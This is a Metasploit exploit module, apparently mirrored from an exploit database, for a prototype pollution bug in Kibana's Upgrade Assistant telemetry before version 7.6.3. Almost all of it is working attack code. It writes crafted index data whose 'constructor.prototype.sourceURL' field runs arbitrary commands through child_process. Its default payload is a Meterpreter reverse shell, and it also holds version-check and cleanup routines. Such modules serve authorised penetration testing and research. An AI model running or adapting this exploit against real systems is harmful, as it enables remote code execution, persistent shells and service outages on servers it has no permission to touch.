## https://sploitus.com/exploit?id=PACKETSTORM:174993
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking # causes service to not respond until cleanup and reboot
include Msf::Exploit::Remote::HttpClient
# decided not to use autocheck since it doesn't work for both targets
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kibana Upgrade Assistant Telemetry Collector Prototype Pollution',
'Description' => %q{
Kibana before version 7.6.3 suffers from a prototype pollution bug within the
Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're
able to execute arbitrary code.
Code execution is possible through two different ways. Either by sending data
directly to Elastic, or using Kibana to submit the same queries. Either method
enters the polluted prototype for Kibana to read.
Kibana will either need to be restarted, or collection happens (unknown time) for
the payload to execute. Once it does, cleanup must delete the .kibana_1 index
for Kibana to restart successfully. Once a callback does occur, cleanup will
happen allowing Kibana to be successfully restarted on next attempt.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Alex Brasetvik (alexbrasetvik)' # original PoC, analysis
],
'References' => [
[ 'URL', 'https://hackerone.com/reports/852613'],
],
'Privileged' => false,
'Arch' => [ ARCH_CMD ],
'Platform' => [ 'linux' ],
'Type' => :nix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
'WfsDelay' => 1800 # 30min
},
'Targets' => [
[ 'ELASTIC', {}], # target kibana through a direct elastic connection
[ 'KIBANA', {}] # target kibana through the dev console to implant elastic data
],
'DisclosureDate' => '2020-04-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN], # down until cleanup and reboot
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(9200), # default to elastic port, kibana is 5601
OptString.new('USERNAME', [ false, 'Elastic User to login with', '']),
OptString.new('PASSWORD', [ false, 'Elastic Password to login with', '']),
OptString.new('TARGETURI', [ true, 'The URI of the Kibana/Elastic Application', '/'])
]
)
end
# https://stackoverflow.com/a/4899857
def time_rand(from = Time.local(2020, 6, 28), to = Time.now)
Time.at(from + rand * (to.to_f - from.to_f)).strftime('%FT%T.000Z')
# outputs 2020-04-17T20:47:40.800Z format
end
# This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session
# it may also only crash when on docker, and may be fine elsewehre. Regardless, good code to not lose just in case.
def kibana_cleanup
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
'method' => 'POST',
'headers' => {
'kbn-xsrf' => @xsrf
},
'ctype' => 'application/json',
'vars_get' => {
'path' => '.kibana_1', # URI for the elastic request
'method' => 'DELETE' # method for the elastic query
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def elastic_cleanup
request = {
'uri' => normalize_uri(target_uri.path, '.kibana*'),
'method' => 'DELETE'
}
request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?
res = send_request_cgi(request)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def execute_command
case target.name
when 'ELASTIC'
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => telemetry_data.to_json
}
request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?
res = send_request_cgi(request)
when 'KIBANA'
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
'method' => 'POST',
'headers' => {
'kbn-xsrf' => @xsrf
},
'ctype' => 'application/json',
'vars_get' => {
'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request
'method' => 'PUT' # method for the elastic query
},
'data' => telemetry_data.to_json
)
end
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 201
end
def telemetry_data
{
'upgrade-assistant-telemetry' => {
'ui_open.overview' => 1,
'ui_open.cluster' => 1,
'ui_open.indices' => 1,
'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('#{payload.encoded}')"
},
'type' => 'upgrade-assistant-telemetry',
'updated_at' => time_rand
}
end
def kibana_create_index
# if the index already exists, this will fail which is fine, we just need it to exist.
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
'method' => 'POST',
'ctype' => 'application/json',
'headers' => {
'kbn-xsrf' => @xsrf
},
'vars_get' => {
'path' => '.kibana_1', # URI for the elastic request
'method' => 'PUT' # method for the elastic query
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
if res.code == 400
vprint_status('Index already exists')
return
end
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def elastic_create_index
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1'),
'method' => 'PUT'
}
request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?
res = send_request_cgi(request)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
if res.code == 400
vprint_status('Index already exists')
return
end
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def kibana_send_mapping
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),
'method' => 'POST',
'ctype' => 'application/json',
'headers' => {
'kbn-xsrf' => @xsrf
},
'vars_get' => {
'path' => '.kibana_1/_mappings', # URI for the elastic request
'method' => 'PUT' # method for the elastic query
},
'data' => mapping_data.to_json
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def elastic_send_mapping
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1', '_mappings'),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => mapping_data.to_json
}
request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?
res = send_request_cgi(request)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def mapping_data
{
'properties' => {
'upgrade-assistant-telemetry' => {
'properties' => {
'constructor' => {
'properties' => {
'prototype' => {
'properties' => {
'sourceURL' => {
'type' => 'text',
'fields' => {
'keyword' => {
'type' => 'keyword',
'ignore_above' => 256
}
}
}
}
}
}
},
'features' => {
'properties' => {
'deprecation_logging' => {
'properties' => {
'enabled' => {
'type' => 'boolean',
'null_value' => true
}
}
}
}
},
'ui_open' => {
'properties' => {
'cluster' => {
'type' => 'long',
'null_value' => 0
},
'indices' => {
'type' => 'long',
'null_value' => 0
},
'overview' => {
'type' => 'long',
'null_value' => 0
}
}
},
'ui_reindex' => {
'properties' => {
'close' => {
'type' => 'long',
'null_value' => 0
},
'open' => {
'type' => 'long',
'null_value' => 0
},
'start' => {
'type' => 'long',
'null_value' => 0
},
'stop' => {
'type' => 'long',
'null_value' => 0
}
}
}
}
}
}
}
end
def check
if target == targets[0] # elastic
return CheckCode::Unknown('Unable to determine Kibana version from Elastic database')
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),
'method' => 'GET',
'keep_cookies' => true
)
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
# this pulls a big JSON blob that we need as it has the version
unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
end
version_json = CGI.unescapeHTML(Regexp.last_match(1))
begin
json_body = JSON.parse(version_json)
rescue JSON::ParserError
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
end
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?
@version = json_body['version']
if Rex::Version.new(@version) < Rex::Version.new('7.6.3')
return CheckCode::Appears("Exploitable Version Detected: #{@version}")
end
CheckCode::Safe("Unexploitable Version Detected: #{@version}")
end
def exploit
@clean = true
fail_with(Failure::BadConfig, 'A password has been defined without a username') if datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?
case target.name
when 'ELASTIC'
print_warning('RPORT should most likely be set to 9200 when exploiting the ELASTIC target') if datastore['RPORT'] != 9200
print_status('Creating index')
elastic_create_index
print_status('Sending index map')
elastic_send_mapping
when 'KIBANA'
print_warning('RPORT should most likely be set to 5601 when exploiting the KIBANA target') if datastore['RPORT'] != 5601
# xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2
# https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3
@xsrf = 'kibana'
print_status('Creating index')
kibana_create_index
print_status('Sending index map')
kibana_send_mapping
end
print_status('Sending telemetry data with payload')
execute_command
print_status("Waiting #{datastore['WfsDelay']} seconds for shell (kibana restart/cleanup)")
end
def cleanup
return unless @clean
if target.name == 'KIBANA'
print_error('Cleanup must happen on the Elastic Database for Kibana to start. You need to DELETE /.kibana_1')
# kibana_cleanup
return
end
print_status('Removing telemetry data to prevent Kibana locking on restart')
elastic_cleanup
end
end